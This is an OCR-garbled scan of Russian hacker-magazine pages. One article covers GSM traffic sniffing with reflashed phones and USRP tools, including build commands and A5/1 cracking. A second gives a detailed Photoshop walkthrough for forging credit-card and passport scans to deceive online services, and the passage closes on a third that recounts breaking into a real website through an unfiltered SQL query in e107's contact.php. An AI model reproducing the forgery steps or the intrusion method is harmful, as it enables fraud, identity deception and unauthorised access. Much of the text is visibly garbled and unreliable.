идентификатор самой соты, являющийся частью СО I (Сеіі ОІоЬаІ ІбепБіу). 
Замечу, что контроль данного параметра позволяет грубо установить мес- 
тонахождение абонента без обращения к Босаііоп Меазигетеп* ІІпі* (І_МІІ) 
на стороне базовой станции. В зависимости от распределения базовых 
станций местоположение пользователя может варьироваться от несколь- 
ких сотен метровдо километров. Тем не менее, этот фактор используют мно- 
гие службы быстрого реагирования и спасатели, что вылилось в название 
технологии позиционирования Е-СЮ (ЕпЬапсесІ Сеіі Ібепббсабоп). Более 
того, был открытлюбительский сервис, задача которого — определение 
местоположения по СЮ: двтіос.огд/сосіе . 

Второй важной характеристикой твоего телефона является І_АС (Босабоп 
Агеа Собе). Все базовые станции объединены в определенные логические 
группы (БА), каждая из которых имеет номер. Связка СЮ и БАС уникаль- 
на для отдельно взятого телефона. Подробности ищи на ШрУ/рго-двт. 
іпіоЛосабоп-ирбаіе.ІпітІ. 

ЕѴѴШ00ѴѴ5М0ВІІЕ 

Из пяти испробованных программ на моем НТС з71 0 (платформа ѴѴІпбоѵѵз 
МоЬІІе 6) захотела работать только одна — под названием СЮБод. Прога 
отображает МСС, МЫС, БАС, СеІІЮ, ССН, ТА и уровень сигнала. Она весьма 
капризно себя ведет: на ряде устройств выводила только БАС, на других 
вообще не хотела запускаться. 
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Перечисленные программы понадобятся нам непосредствен- 
нодля поиска базовой станции. Далее будет освещен еще 
один метод поиска — по скачкам сигналов. 

Н БЛИЖЕ К ДЕЛУ 

В начале 2007 года известная хакерская команда ТНС начала 
работу над составлением базы данных по ѲЗМ-безопасности 
(и ее компрометации, в частности). Основной целью было 
создание анализатора (65М Зсаппег), способного разбирать 
накопленную информацию — для продолжения исследования 
в более широком виде. Прямо скажем.такие вещи уже давно 
созданы и, в первую очередь, предназначены для использова- 
ния в качестве контрольно-измерительного и калибровочного 
оборудования. Например, аппаратура 5А6ЕМ ОТ200/ОТ460 
( задет.сот.иа/иа/тоЬІІеМ/5А6ЕМ-ОТ20(НІІе.рсіЯ .Дамп 
данных в дальнейшем декодируется ЕбдеѴіеѵѵ ( зедіаиік 
пеі/дзт/ЕРбЕѴІеѵѵ/ ) или ѴѴігезЬагк. Все данные и примеры, 
отмеченные авторами проекта в разделе ОеЬидТгасе ( ѵѵікі. 
іИс.огд/дзт/сІеЬидІгасе І.тебе под силу получить и привести 
самому. 

Данные, передаваемые по воздуху, шифрованы и расшифро- 
вываются непосредственно на точке доступа, которая знает 
ключ сессии и передается оператору. Теоретически, возможна 
дорогостоящая авантюра с организацией собственной Ѳ5М- 
мачты (чтобы отслеживать пользовательские данные в режиме 
пассивного анализа). Но некоторые данные можно изучить в 
«сіеагіехі» и без этого. По анализу эфира можно понять, какое 
шифрование применено — ІМ5І Ю, РАІ\Ю СірбегКеу, 5РЕ5. 
Рассмотрим подходы и способы получения данных с эфира 
65М-сессий. 

Б ПЕРЕДЕЛАННОЕ ОБОРУДОВАНИЕ 

Стандартные мобильные телефоны могут быть перепрошиты 
на захват/генерацию фреймов эфира. Одним из наиболее 
наглядных примеров сего факта является проект ОрепТЗМ. 
Под тривиальный телефон Т5М30 предлагается установить 
специальный софт, который будет осуществлять эти опции. 
Кстати, создатели ТНС хвастаются тем, что используют 
для того же самую старенькую модель N О КІ А 33 1 0 . Отме- 
чу, что вся серия КІОКІАсІсО (3210, 3310, 3330, 3390 ит.п.) 
способна натакое с использованием специального патча 
( покіх.ра5]адзт.рІ/беІр/Ыаскзрбеге/зиЬ 2505окѵѵаге/ 
зиб зепсІсосІе.Ы:пп ) под недокументированные фишки ядра 
N О КІ А. Проект ВІаскЗрбеге как-то даже решил копнуть в 
сторону создания собственной операционной системы под 
N окіа бсіЗ — МАОоз. Про метод перепрошивки ты можешь 



узнать на форуме любителей реверса ІМОКІА ( бкрУ/покіаІтее. 
огдЯогитз/іпсІех.рбр ). 

ВЫБвР 

Она же — универсальная ради о- периферия. Обычно 
используется в следующей конфигурации: стационар- 
ный компьютер, материнская плата с радио-периферией 
(115ПР-РК6), ресивер на материнскую плату (0В5РХ-ЕЕ, 
работает в диапазоне 800 -2400 М Н т], ЕР0926 (антенна). В 
качестве сподручного софта юзают: дпигасііо, дзтзр или 
ѴѴІгезбагк по вкладке 65М. В качестве примера я расска- 
жу про пакет 655М ( ібге.аі/дзт/ ). который предназначен 
для мониторинга каналов 65М. 

Пакет состоит из специального модуля захвата, названного 
ѲЫІІ РАО 1 0 , для демодуляции захваченного и ѴѴІгезбагк 
— для отображения информации. Ѳ55М распознает 
большинство известных природе каналов, наиболее часто 
используемых в 65М. Вот расшифровки аббревиатур: ЕССН 
(Тбе Лециепсу соггесііоп сбаппеі), 5СН (Тбе зупсбготгабоп 
сбаппеі), ВССН (Тбе Ьгоасісазі: сопіхоі сбаппеі), РСН (Тбе 
рад і пд сбаппеі. Ооѵѵпііпк опіу, изесі Іо раде тоЬІІез), А6СН 
(Тбе ассезз дгапі: сбаппеі. Ооѵѵпііпк опіу, изесі Іо аііосаіе ап 
50ССН огбігеску а ТСН), 5АССН (Зіоѵѵаззосіаіеб сопігоі 
сбаппеі), 50ССН (Зіапсі-аіопе бебісаіеб со пігоі сбаппеі). 

Ход установки предельно прост. Сначала собираем ѲЫІІ РАОІО : 

зѵп со Ъ.ккр : //дпигасііо . огд/зѵп/дпигасііо/кгипк 
дпигасііо 
$ . /Ъоокзкгар 
$ . /сопкідиге 
$ таке 

$ таке скеск 
$ зисіо таке іпзкаіі 

Затем тянем дзет. 

ѵ/дек кккр : //ккге . ак/дзт/дзт-ѵО . 1 . каг .Ъг2 
каг — хѵз к дзт-ѵО . 1 . каг . Ът.2 

. /Ьоокзкгар && ./сопкідиге && таке && зисіо таке 
іпзкаіі 

Советую также скачать последнюю версию ѴѴІгезбагк в 
качестве графического фронтенда. Если же ты все-таки 
уперся в «старое доброе», — то пропатчи его специаль- 
ным модом из пакета дззпп. Просто помести мод в папку с 
сорцами: 



> ІП^О 

• Анализ собственного 
65М-трафика, декоди- 
рование и изучение не 
является уголовно на- 
казуемым делом. Вне 
закона ты станешь при 
условии совершения 
таких действий против 
других абонентов. 

• Папб-ключ — уста- 
новление подлиннос- 
ти начинается сетью 

в виде сообщения 
опознавательного 
запроса, посланного 
мобильной стан- 
ции. Это сообщение 
содержит 1 28-битное 
случайное число. 

• Згез-ключ — ответ 
от базовой станции 
(Зідпеб РЕЗиІі). 
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> ѵѵагпіпд 

УчастникТНС, из- 
вестный 65М-хакер 
Зкурег, был задержан 
в аэропорту во время 
своей поездки на одну 
из Зесигйу-конфе- 
ренций в Дубай, на 
которой выступить 
ему так и не удалось. 
Исходя из опыта 
известного ресечера, 
соблюдай меру в своих 
действиях. 






ШШ 



раСсЪ -рі < -/згс/дззт/раСсЬ/’мігезЪ.агк- 
0.99. 5-дззт.раОсЪ. 

. /сопбідиге && таке && зисіо таке іпзкаіі 

Для связки захвата пакетов и их отправки ѴѴІгезЬагк исполь- 
зуются некоторые функции из модуля Сил, так что не забудь 
подгрузить его командой зисіо тосіргоЪе ѣип и проверить 
наличие модуля командой ІзгтюсІ. 

Итак, основные шаги выполнены. Следующая операция заклю- 
чается в создании интерфейса нашего канала, после чего можно 
смело натравливать ѴѴІгезЬагк на интерфейс. Для создания 
применяется программа лікСил, которая входит в поставку па- 
кета дзет -.зисіо /изг/1оса1/Ьіп/ткіип дзт. Осмотрись в 
Неопіід; если все прошлоуспешно, то обрати внимание на набор 
специальных скрипов на руіЬоп: изгр_ккѣ .ру, дззт_изгр. 
ру. Первый из них задает частоту для мониторинга: 

изгр_ССР.ру --с!есіт=32 --даіп=26 --бгед=921М 

Идея в том, что, задав желаемую частоту, а также подкоррек- 
тировав шаг нанесения на плоттер, мы можем понять, в каком 
конкретном месте находится базовая станция и каким типом 
трафика она швыряется в данный момент. 

Вторым интересным набором для примернотехже целей 
является 03М5Р [ Ьир://ѵуікі.іНс.огд/дзт?асііоп=АиасЬРі1.е&сІо 
=деі&іагдеі=д5іті5р-0.2а.іаг.д2 ]. 

Средство можетбыть собрано под ѴѴІпбоѵѵз с помощью Судѵѵіп. 
Оно обладаетболее дружелюбным видом. 

Отслеживание гапб- и згез-ключей 
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В одном из выпусков «] [акера» ты уже мог видеть мою 
статью, где перечислялись основные вещи, которые 
логирует оператор сотовой связи в своих базах. Одной 
из наиболее важных баз является реестр местоположе- 
ния (НЬК), по которому тебя можно быстро обнару- 
жить, — нравится тебе это или нет. Вдобавок, советую 
ознакомиться с вариантами современных технологий 
позиционирования, в том числе Е-СГО Отиерозігіоп. 
сот/розійопіпу есіб.рЬр) . 



^ ЧТО ДЕЛАТЬ С СОБРАННЫМ? 

Ответочевиден: разбирать и пытаться расшифровать. Часть 
вещей уже созданы за тебя и вполне могутпомочь. Сначала 
рекомендую обратиться к программе ѲБМсІесосіе [ ЬирУ/ѵѵікі. 
іЬс.огд/дзт?асІіоп=АиасЬРІІе&сІо=деІ&Іагдеі=д5тсІесосІе- 
0.5-ѵѵіп32.ехе ). Она предназначена для расшифровки лога с 
датти или лога с любой собранной тобой программы. 

Стоит сказать, что алгоритм А5/0 был взломан еще в девянос- 
тых, а А5/1 лабораторно ломается по атаке таблицей ПаіпВоѵѵ 
ТаЫе, размер которой должен быть около двухтерабайт. По 
расчетам ученых, на созданиетакой таблицы потребуется око- 
ло40 специальных вычислительных плат РРСАдля распарал- 
леливания процесса. Псевдокод программы для генерации 
таблицы ты можешь найти на диске кжурналу. 

ННАРРѴЕЫО 

Как видишь, Ѳ5М хранит в себе много тайн. Да -да, техничес- 
киетребования тайно разрабатывались Консорциумом Ѳ5М 
и передавались индивидуальным разработчикам с целью 
защиты отанализа их криптоалгоритмов и технологии в 
целом. Кто знает, может в один прекрасный день, ты узнаешь 
нечто большее, чем описано в статье, и за тобой будут го- 
няться все, кому не лень. ИНИ 
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МУТИМ СКАНЫ 

--Д 



КАК И ЗАЧЕМ ПЕРЕРИСОВЫВАЮТ ДОКУМЕНТЫ 



Об анонимности в Сети мы писали не раз, но зачастую требуется не только 
скрыть свой ІР-адрес и местоположение, но и замаскировать собственн 
личность под чужую. Как это сделать? Есть способ — воспользоваться видо- 



^ ВЗЛОМ 



ЛЕОНИД «НОЮ» СТРОИКОВ ВЛАДИМИР «ООТ.ЕНН» САВИф 

' з1гоікоѵ@датеІапсІ.ги / / каііоіІііе@Ьк.ги / 



измененными сканами доков. 



В ОТКУДА СКАНЫ, ДЯДЯ? 

Рисование и использование ска нов требует не только умения работы 
с фотошопом, ноизнания определенных нюансов. Для начала разбе- 
ремся в сути вопроса, а именно — зачем могут понадобиться сканы, 
где брать материал для их перерисовки и как лучше всего юзать 
фейковые копии доков. Не секрет, что многие онлайн-сервисы при 
оформлении аккаунтов просят предоставить копии личных доку- 
ментов. Как правило, это паспорт или водительское удостоверение. 
Изредка при оплате услуг необходимо выслать скан кредитной карты. 
Но одно из основных правил безопасной и анонимной работы в Сети 
гласит: «Не оставлять личных данных без крайней надобности». Базы 
ломаются, сливаются и продаются вместе со всей оставленной тобой 



информацией, поэтому гораздо безопаснее представиться гражда- 
нином какой-нибудь забугорной страны и не создавать себе лишних 
проблем. Но как раздобыть сканы для последующей перерисовки? 
Самый примитивный путь — воспользоваться помощью Гугла. Да-да, 
хорошенько по юза в поисковик, можно откопать десяток отсканиро- 
ванных паспортов и удостоверений. Но гораздо продуктивнее слить 
БД, содержащую сотни/тысячи сканов разнообразных документов. 
Так можно надолго обеспечить себя материалом для перерисовки 
доков. 

В общем, поимевтребуемое число сканов и снабдив Ооі.егг'а изрядным 
количеством пива в комплекте с РЬоіозЬор С53, мне ничего не оставалось, 
кроме какждатьдня рождения нужныхдоков. 
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В РАБОТАЕМ С МАТЕРИАЛОМ 

Приступим! Рулить будем Фотошопом С53, но ничего страшно- 
го, если в руках окажется версия на пару лет старше. Чтобы не 
путаться в вариантах переводов, названия команд и инстру- 
ментов я буду сопровождать соответствующими хоткеями. 
Грузим РЬоФвЬор, создаем новый проекте именем «Іасе», 
размерами 640x480, разрешением 72 пикс./дюйм и ставим 
прозрачное содержимое фона. Выбираем инструмент«Го- 
ризонтальный текст» (хоткей Т), заранее скачанный шрифт 
ОСР А ЕхіепбесІ 36-го размера и набираем 1 6 цифр в формате 
«ХХХХХХХХХХХХХХХХ». Дважды жмем <Еп1;ег>, меняем размер 
шрифта на 24, отступаем три пробела и вводим даты «03/04», 
три пробела, «03/08». На следующей строчке 30-м шрифтом 
ОСР-В 10 ВТ большими буквами уточняем имя и фамилию 
владельца (для примера введем ІѴАЫ ТАРАЫОѴ) и на этом за- 
кончим редактирование текста. Выбираем «Редактирование 
-> Определить узор», вводим «Гасе_і пбо». Сохраняемся под 
именем басе_і пбо. рзсі . 

Создаем еще один проект, называем его «!асе». Прочие пара- 
метры оставляемтеже.Жмем <М> и настраиваем инструмент 
«Прямоугольная область»: стиль «Заданный размер», ширина 
580 пикселей, высота 380. Щелкаем по холсту и перетаскиваем 
выделение на центр. В меню выбираем «Выделение -> 
Модификация -> Оптимизировать», вводим 1 9, «Ок». Инстру- 
ментом «Заливка» (хоткей Ѳ) заполняем выделение произ- 
вольным цветом. Переходим по меню «Слой -> Стильслоя -> 
Тиснение -> Текстура», выбираем РасефпІо.рвсІ в качестве 
текстуры и 1 00% непрозрачность в качестве параметра. Сохра- 
няем проект под именем Іо_Ьаск.рзсІ. Он нам понадобится для 
рисования обратной стороны карты. 

Создаем новый слой с именем соѵег_іп!о. Для этого переходим 
«Слой -> Новый -> Слой» или жмем <5Ы^+СігІ+І\І>. Набираем 
за ново точно та кой же текст с тем и же параметрами, как было 
описано выше (1 6 цифр, даты, имя и т.д.). При достаточном 
увеличении (<2>), перетаскиваем только что набранныйтекст 
поверх старого тиснения. Для дальнейшей работы с текс- 
том его нужно преобразовать в растр. Выбираем «Слой -> 
Растризовать -> Слой». При нажатой клавише <СМ> кликаем 






по слою соѵеНпІо (на холсте должен выделиться текст) и 
переходим «Выделение -> Модификация -> Сжать», — а 
сжимать будем на 1 пиксель. Удаляем лишнее: «Выделение 
-> Инверсия» (<5Ы^+СМ+І>), жмем <ОеІеіе>, «Выделение -> 
Отменить выделение» (<СМ+0>). 

Продолжим обработку будущего тиснения. Найдем мен юшку 

«Слой -> Стильслоя -> Параметры наложения» и последова- 
тельно пройдем по пунктам: 

1. «Внутреннее свечение». Непрозрачность — 100%, цвет 

— #СССССС, контур — НаІбРоипсІ (изображение четверти 
круга). 

2. «Тиснение». Переходим в подраздел «Контур», диапазон 
-50%. 

3. «Наложение цвета». Непрозрачность — 100%, цвет 

— #ЕЕЕЕСС. 

4. «Обводка». Размер — 1 пиксель, непрозрачность — 100%, 
цвет— #ВЕВЕВР. 

Надеюсь, цвет карты не режет глаз кислотными оттенками. 
Сохраняем, закрываем. 

Следующий этап — работа над фоном. На просторах интернета 
лежит множество красивых пейзажей, фоток городов, архитек- 
турных памятников и т.п. Пошарив в ітадев.доодіе.ги, я нашел 
красивые древние руины. Не знаю, чем они мне приглянулись, 
но остановился именно на них. Сохранив картинку в надежном 
месте на винте, сделаем копию и перетащим в Фотошоп. 
Подгоняем размеры фотки под размер будущей карточки: 
«Изображение -> Размер изображения» (<Аи+СШ+І>). Сразу 
же убираем галочку с опции «Сохранить пропорции» и задаем 
размеры 580x380. Не нужно воспринимать все буквально, и 
машинально повторять описанные действия! Если картинка 
приплюснута сверху или снизу, стоит отдельно с ней порабо- 
тать (вырезать изображение нужных размеров из исходного 
либо, сохраняя пропорции, уменьшить изображение, задать 
нужную длину или ширину и обрезать лишнее). 

Итак, перед нами фото 580x380, которое нужно немного 
обработать. Открываем меню «Изображение -> Коррекция -> 
Цветовой тон/Насыщенность» (<СМ+ІІ>). Уменьшаем насы- 
щенность и яркость в зависимости от исходного изображения. 




> ІП^О 

• Как правило, на 
скане паспорта можно 
найти практически 
все для составления 
выбранного псевдо- 
нима. 



• Имеет смысл 
сделать несколько за- 
готовок по документам 
нужных стран. Впос- 
ледствии намного 
проще использовать 
бланки-шаблоны, чем 
перерисовывать доки 
каждый раз с нуля. 



» СІѴСІ 

На нашем диске 
ты найдешь видео 
к статье, при просмот- 
ре которого наглядно 
убедишься в возмож- 
ности качественной 
перерисовки любых 
сканов. 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно 
с целью ознакомле- 
ния! Ни автор, 
ни редакция за твои 
действия ответствен- 
ности не несут! 
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В моем случае были выставлены -30 и -1 0, соответственно. Далее: «Фильтр 
-> Размытие -> Размытие_по_Гауссу». Выбираем значения в промежутке 
0, 5-0, 8. 

Все на техже просторах Сети нетрудно найти логотип (допустим, Ѵіза) и 
более-менее приличную по качеству голограмму («голубка»). Копируем, 
вставляем. Фото, логотип и голограмма должны находиться на разных сло- 
ях. Масштабируем (<СМ+Т>), подгоняя под размеры карточки, и соблюдаем 
пропорции. Оформим название банка (просто стильная надпись — или, 
если косить под что-то конкретное, то нужно вырезать из оригинального 
скана). Сохраняем как ЬаскдгоипсІ.рзсІ. Переходим «Редактирование -> 
0пределить_узор», подтверждаем и закрываем проект. На руках должны 
быть три проекта: басе_і пбо.рзсі с набраннымтекстом, Іо_Ьаск.рзсІ с сырой 

заготовкой для обратной сторо- 
ны, ідсе.рзсі с макетом карты и 
ЬаскдгоипсІ.рзсІ со всем остальным. 
Открываем басе. рзсі , выбираем 
«Слой -> Стиль_слоя -> Пере- 
крытие_узора». Непрозрач- 
ность ставим 100%. Выбираем в 
качествеузора ЬаскдгоипсІ.рзсІ и 
жмем кнопочку рядом «Привязать к 
началу координат». Подтверждаем 
изменения («Да» или «Ок»), Ну, как 
оно? Несколько штрихов и лицевая 
часть карты закончена. Наносим 
недостающие надписи: кликаем 
по инструменту «Горизонтальный 
текст» (хоткей Т), жирным шрифтом 
Агіаі 12-го размера вводим «ѴАІ_Ю», 
на следующей строке «ГРОМ» и 
размещаем над первой датой. Тоже 
самое — с надписью «ѴАІ_Ю ТНПІІ» 
(но находиться она будет над второй 
датой). Затем продублируем первые 
четыре цифры жирным Агіаі’ом 
14-го размера и перетащим их ниже 
основных. 



Чтобы закосить под скан, объединяем все слои в один: «Слой -> Объ- 
единить видимые» (<5ЫТС+СМ+Е>). Теперь — «портим» изображение: 
«Фильтр -> Шум -> Добавить шум». Количество 3%, распределение равно- 
мерное. Так как отска нить карточку ровно мы не можем, повернем ее на 1 -2 
градуса. Для этого кликаем «Редактирование -> Трансформирование -> 
Поворот» и вводим градус поворота. Пустое место должно быть закраше- 
но. Создаем новый слой (<СігІ+5Ый+І\І>), заливаем его белым цветом при 
помощи инструмента «Заливка» (<6>) и перетаскиваем ниже остальных 
(панель со слоями находится справа внизу). 

Стираем потслица. Ноза кофе тянуться еще рано: нужно накидать обрат- 
ную сторону карты. Открываем проект басе_іпбо.р5СІ и сохраняем под именем 
Ьаск_Ьаскіехі.рзсІ. Выполняем «Редактирование -> Трансформирование 
-> Отразить по горизонтали», затем — «Редактирование -> Опреде- 
лить_узор». Фотошоп предложит название Ьаск_ЬаскіехСрзсІ.Жмем «Ок» 
и закрываем проект. 

Открываем заранее сохраненный Ф_Ьаск.рзсІ. Переходим «Слой -> Стиль 
слоя -> Тиснение» и правим параметры (перечислены сверху вниз по 
порядку): 

• Стиль : внутренний скос ; 

• Метод: жесткая огранка; 

• Глубина: 52%; 

• Размер : 3 ; 

• Угол : 90; 

• Высота: 67; 

• Контур: Ьіпеаг (самый первый) ; 

• Режим подсветки: нормальный; 

• Непрозрачность: 100%; 

• Режим тени: умножение; 

• Непрозрачность: 59%. 

Щелкаем по подразделу «Текстура», меняем узор на ЬасЩЬаскіехГрзсІ и 
ставим галочку в чекбоксе «Инверсия». Оформим обратную сторону нена- 
вязчивым цветом. Мне подошел воттакой оттенок: красный 1 08, зеленый 
120, синий 132. Жмем <С> или выбираем инструмент «Заливка» и кликаем 
по карте. 

Теперь наносим логотипы и надписи. Для этого нужно создать еще один 



Слои + эффекты 




► 054 
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проект 580x380 (обозвать его «Іодо_і п^о. рзсі ») . Закрывать {о_Ьаск.рзсІ не 
советую, так как нужно иметь перед глазами карточку. Логотипы в большом 
ассортименте можно найти все втомже Гугле или отсканитьсо своей кре- 
дитки. Размещаем два (размером примерно 130x70 каждый) — в нижнем 
левом углу первый и чуть правее — второй. Тулзой «Горизонтальный текст» 
(<Т>) 12-ымжирным шрифтом Агіаі вводим что-то типа: 

Ву ассерСіпд апсі ог изіпд Йііз сагсі, уои адгее Со СЛе АссоипС 
АдгеешепС . СеС сазЬ апсі ог таке ригсказез ѵТЬеге уои зее 
СЬ.езе Іодоз. Рог уоиг ргоСесСіоп, сЗо поС ъпгіке уоиг регзопаі 
ісЗепСіГісаСіоп питЬег (РШ) оп СМз сагсі. Рог сизкотег 
зегѵісе саіі Рог Сгее 868-647-74505 ѵлам. Сгиесагсіз . сот 
Переходим «Редактирование -> Определить узор» и соглашаемся с пред- 
ложенным названием « Іодо_і пбо. рзсі». 

Возвращаемся кіо_Ьаск.р5СІ, переходим по меню «Слой -> Стиль слоя 
-> Перекрытиеузора». Узором ставим Іодофпіо.рвсі, непрозрачность 
определяем в 100%. Щелкаем «Привязать к началу координат», отодвига- 
ем менюшку в сторону и смотрим результат. На карточке должны появиться 
логотипы и надпись (есть возможность подкорректировать положение, 
перетащив все мышкой, куда нужно). Подтверждаем изменения. 
Добавляем магнитную полоску. Инструментом «Прямоугольная область» 
(<М>) выделяем прямоугольник длиной во всю карту и высотой около 
63 пикселей. Заливаем (<Ѳ>) черным цветом. Создаем новый проект 
«таз5_ѵІ5а.рзб» размерами 200x200 и, начиная с верхнего левого угла, 
вбиваем повторяющийся через два пробела текст «ѴІ5А ѴІ5А ѴІ5А» — и 
т.д., до правого края. Начиная с первого слова, нужно раскраситьтекст в 
синие и желтые цвета (чередуются). Выбираем «Слой -> Растризовать -> 
Слой». Щелкаем инструмент «Кисть» или жмем <В>. Выбираем размер 3 
и проставляем точки (три раза кликая мышью) соответствующего цвета 
после каждой надписи ѴІ5А. Жмем <М>, обводим строку, копируем и 
вставляем — размещаем ниже предыдущей так, чтобы желтое слово ѴІ5А 
было под синим. Теперь обводим уже две строки, копируем и вставляем 
до самого нижнего края холста. Выполняем «Слой -> Объединить види- 
мые» (<5НТНС1:г1+Е>). Немного поворачиваем через «Редактирование 
-> Поворот». Жмем <М> и растягиваем прямоуголен и к та к, чтобы он был 
полностью заполнен текстом. Выбираем «Слой -> Новый -> Скопировать 
на новый слой» ЦСМ+Щ). Далее — «Изображение -> Тримминг», пере- 
ключатель на «прозрачных пикселей», «Ок». Поздравляю: мы получили 
квадрат, заполненный косым текстом. Старый слой нужно удалить. 
Выполняем уже до боли знакомое действие «Редактирование -> Опреде- 
лить узор», «Ок». Открываем 1о_Ьаск.рзсІ, создаем новый слой, растяги- 
ваем прямоугольное выделение (хоткей М) размерами примерно 480x50, 
заливаем белой краской (<Ѳ>). Теперь работаем с менюшкой «Слой -> 



Стиль слоя перекрытиеузора»: режим — нормальный, непрозрачность 
— 65%, узор — та55_ѵІ5а.р5СІ. Кликаем по кнопочке «Привязать к началу 
координат». Самое страшное позади :). 

Набираем 24-м шрифтом Агіаі Ыаггоѵѵ номер карты (тотже, что и на лицевой 
стороне) и — через пробел — три цифры дополнительного кода. Переходим 
«Редактирование -> Трансформирование -> Наклон» и наклоняем цифры 
немного влево. На новом слое цветом, похожим на синюю шариковую 
ручку, печатаем «рукописным» шрифтом (либо рисуем) подпись владельца. 
Объединяем видимые слои (<5Ы11:+С1:г1+Е>), поворачиваем на -1 градус 
(«Редактирование -> Трансформирование -> Поворот»). «Подкладыва- 
ем» под карточку белый слой, жмем <5Ык+СМ+Е>. Переходим по менюшке 
«Фильтр -> Шум -> Добавить шум», 3%, «Ок». Сохраняем готовый «скан» в 
нужном формате. 

Подредактируем паспорт. Для работы со сканом можно воспользоваться 
несколькими простыми приемами. 

1. Ищем на скане необходимые для набора слова буквы. Как правило, 
можно с легкостью найти практически все для составления выбранного 
псевдонима (в моем случае — ІѴАЫ ТАРАЫОѴ). Вырезаем каждую букву на 
отдельный слой, названный в честь этой буквы. 

2 . Формируем недостающие символы. В моем случае отсутствовала буква 
«V». Ситуация разрешилась копированием буквы «А», поворотом на 180 
градусов и попиксельным редактированием при максимальном увеличе- 
нии. При наличии двух и более сканов эта проблема исчезает. 

3. Затираем оригинальныйтекст. Самый простой вариант— копирова- 
ние небольших областей до 1 5 пикселей и вклеивание их на место букв 
(но удачно провести это можно далеко не всегда). Болеетрудоемкий и 
качественный способ — подбор цвета пикселей под оттенки ближайших 
окружающих. Долго, нудно, но практически 100% результат на водяных 
знаках и других защитах. 

Н ЦЕНА ВОПРОСА 

Перерисовка сканов для своих нужд — дело зачастую неблагодарное. 
Поэтому, если времени категорически нет, а сканы нужны срочно — имеет 
смысл воспользоваться услугами профессиональных дизайнеров, контак- 
ты которых можно без труда найти натематических форумах. Цена одной 
перерисовки под конкретные данные колеблется в районе 50 вечнозеле- 
ных. Кстати, если тебе не лень искать нужный материал, а Фотошоп снится 
тебе по ночам — можешь попробовать пустить свой талант в массы, благо 
потребность в качественных рисовальщиках была, есть и будет. В любом 
случае, как распорядиться полученными навыками — решай сам. Наша 
задача была лишь втом, чтобы показать тебе, как и зачем перерисовывают 
сканы различных документов.^ 
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ВА5Н.0Р6.ВІІ — 
ПОСМЕЯЛИСЬ 



И ХВАТИТ! 



БЕСПРЕЦЕДЕНТНАЯ АТАКА НА ЦИТАТНИК РУНЕТА 





На улице шел проливной дождь. Было грустно, и я решил почитать баш. 

За чтением мне пришла в голову безумная идея попасть в админку цитат- 
ника рунета и пощупать его изнутри. Самое главное — где-то спустя полдня 
археологических изысканий мне это удалось! 



НОТ ИДЕИ К ДЕЙСТВИЯМ 

Расскажу подробнее о наивнейших ошибках людей, отвечающихза софт на 
серверах русского башорга. Итак, погнали! 

Первым делом я немного пощупал скрипты самого башорга. Единствен- 
ным интересным открытием был фришный рЬр-скриптОрепабз 2.0.1 1-рг1 
( рбрасізпеѵѵ.сот ]. расположенный по адресу ЬирУЛоІ.ЬазЬ.огд.ги/Ь/асІтіп/ 
іпсІех.рЬр . Скрипт отвечаетза текстовую рекламу, расположенную между 
цитатами на всех страницах баша. Посерфив пару-тройку секурити-порта- 
лов, я не нашел ни одного пабликсплойта под эту версию. Немного покопав 
движок на предмет багов, я решил оставить его на потом, и продолжил свои 
поиски. 

Следующим шагом был сервис ѵѵѵѵѵѵ.зеоІодз.сот/ір-сІотаіпв.ЫтІ . который 
показал мне все виртуальные домены, расположенные на ІР-адресе баша 
(89.1 1 1 .182.137]. Это были: 

ІіССр : //апішаи . ги 
ТЩЦр : / /ЪазЪ. . огд . ги 
ЬЩДр : / /СапіЬаСа . ги 
ТЩЦр : / /ѵ\гагс1з . ЬазЪ. . огд . ги 

Как видишь, улов не особо густой. Единственным доступным из этих адре- 
сов, не считая самого баша, был сайт іапіЬаІа.ги . посвященный фестивалю 
японской анимации (чертовы анимешники :)). За него я и взялся. 



г НЯ! 

Вскользь просмотрев исходник главной страницы подопытного сайта, я 
увидел строку: 

<зсгірС Суре= ' СехС/ д аѵазсгірС 1 
згс= ' /е107_Сі1ез/е107 . 33 ' ></зсгірС> 

и очень обрадовался, что там установлен «самый безопасный движок по 
версиижурнала РС Мадагіпе» еі 07 :). Следующим шагом было определе- 
ние версии движка. Насколько я знал, сделать это можно, по меньшей мере, 
двумя способами. Первый — пройти по адресу Ьир:/ЛапіЬаІа.ги/е1 07 сіосз/ 
РЕАРМЕ ЦРСВАРЕ.ЫтЕ Второй — пройти по адресу ШрУЛапіЬаІа. 
ги/е 1 07 асІтіп/асІтіп.рЬр. 

Ни один из способов не прокатил. Тогда я взял за основу дату первой 
публикации новости на сайте (Зипбау 27 Мау 2007) и чисто теоретически 
предположил, что версия движка лежит в пределах от0. 7. 6 до 0.7.8 (причем, 
последняя на момент написания статьи — 0.7.1 1 ). Теперь необходимо было 
немного «посерчить» на ШрУ/тіІѵѵОгт.сот на предмет пабликэксплойтов 
под е 1 07, чем я немедленно и занялся. Под искомые версии движка сущест- 
вовали следующие сплойты: 

е107 <= 0.7.8 (рТюСодгарА) АгЬіСгагу Рііе ТЦрІоасі 
ѴиІпегаЬіІіСу 
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> Ипкз 

• ЬирУ/ЬавЬ.огд.ги 

— виновникторжества 

• Ьир://е107.огд 

— оффициальный сайт 
спав е 1 07 



е107 0.7.8 (таііоик . ркр) Асеева Езсаіакіоп 
Ехріоік (асітіп пеесіесі) 

Второй я отбросил сразу, так как он требовал права админа. 
Прочитав же описание к первому, я вынужден был отбро- 
сить и его, так как это была ложная уязвимость, которая 
предоставляла лишь загруженный рЬр-код в теле фотогра- 
фии (и ничего более). Отложив на время е 1 07, я принялся 
серфить дальше мой подопытный ресурс. Единственной 
зацепой был форум ІР.Воагб, расположенный по адресу 
ШрУЛапіЬаІа.ги Логит/ . Открыв исходник страницы, 
я крайне расстроился, ибо версия ІРВ 2.2.0 была на тот 
момент абсолютно непробиваемой. Ничего не оставалось, 
как самому копать исходники либоІРВ,либое107.Я выбрал 
е 1 07. И не ошибся! 

НИНДИАНАДЖОНСИЕ107 

Слив на свой ноутбук егоз еі 07 0.7.8 и благополучно установив, 
я стал ковырять скрипты. Через несколько часов я получил 
результат в виде скрипта сопѣасѣ .рЪр и следующей строчки 
кода в нем: 

еізе 

{ 

$диегу = "изег_іс1 = 

" . $_РОЗТ [ ' сопкаск_регзоп ' ] ; 

} 

Как видно, переменная $_Р08Т[ 'сопіасі _регзоп ' ] 
подставляется в 5СН_-запрос абсолютно нефильтрованной! 
Трудность заключалась в дальнейших строках кода: 



е-таіі, который ты укажешь сам; иначе — на почту админа. 
Эксплойт для ЫіпсІ вді-іщесбоп был, в принципе, возможен, 
